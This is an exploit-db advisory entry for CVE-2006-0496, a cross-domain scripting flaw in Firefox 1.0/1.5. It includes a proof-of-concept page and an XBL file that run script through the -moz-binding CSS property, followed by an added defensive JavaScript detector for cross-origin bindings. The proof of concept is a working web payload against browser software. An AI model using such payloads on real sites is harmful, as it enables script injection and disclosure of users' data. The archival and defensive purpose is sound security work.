Exploit Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting

Exploiter

18 Dec 2022
EDB-ID: 27150
EDB verification: Passed
Author: CHRIS THOMAS
Vulnerability type: REMOTE
Platform: LINUX
CVE: CVE-2006-0496
Publication date: 2006-01-30
Code:
source: https://www.securityfocus.com/bid/16427/info

Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain.

The issue affects the '-moz-binding' property.


This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information. 

http://domain1/path/to/page.html :

<html>
<head>
<style>
body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>
</head>
<body>
</body>
</html>

http://domain2/path/to/xbl.xml :

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">

<binding id="xss">
<implementation>
<constructor>
alert("XBL XSS");
</constructor>
</implementation>
</binding>

</bindings>
 
Source: www.exploit-db.com
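
A defender-side check for the pattern shown above, as an added example that is not part of the original post or the exploit-db entry: it scans stylesheet text for -moz-binding declarations and reports whether the referenced XBL document sits on a different origin than the page. The function names and the second (same-origin) sample rule are constructed for illustration.

```javascript
// Added example; function names and the sample stylesheet are constructed.

// Remove CSS comments and decode backslash escapes so the property name is
// compared in the form the CSS parser sees. Dropping comments is deliberately
// conservative for a detector: it can only produce extra matches.
function normalizeCss(css) {
  return css
    .replace(/\/\*[\s\S]*?\*\//g, "")
    .replace(/\\(?:([0-9a-fA-F]{1,6})\s?|([^\n]))/g, (_, hex, ch) => {
      if (ch !== undefined) return ch;
      const cp = parseInt(hex, 16);
      return cp === 0 || cp > 0x10ffff ? "\ufffd" : String.fromCodePoint(cp);
    });
}

// Return every -moz-binding url() in cssText, resolved against pageUrl,
// with a flag telling whether it points outside the page's origin.
function findBindings(cssText, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const decl = /-moz-binding\s*:\s*url\(\s*(["']?)([^"')]*)\1\s*\)/gi;
  const findings = [];
  for (const m of normalizeCss(cssText).matchAll(decl)) {
    try {
      const target = new URL(m[2].trim(), pageUrl);
      findings.push({ url: target.href, crossOrigin: target.origin !== pageOrigin });
    } catch {
      // Unparseable URL: report it as cross-origin rather than skip it.
      findings.push({ url: m[2], crossOrigin: true });
    }
  }
  return findings;
}

// Constructed sample: the declaration from the page plus a same-origin one.
const sampleCss = `
  body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
  div.menu { -moz-binding: url(widgets.xml#menu); }
`;
for (const f of findBindings(sampleCss, "http://domain1/path/to/page.html")) {
  console.log(f.crossOrigin ? "CROSS-ORIGIN" : "same-origin", f.url);
}
```

A sanitizer for untrusted CSS would normally drop the -moz-binding declaration outright; the origin comparison is for auditing stylesheets you already serve.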
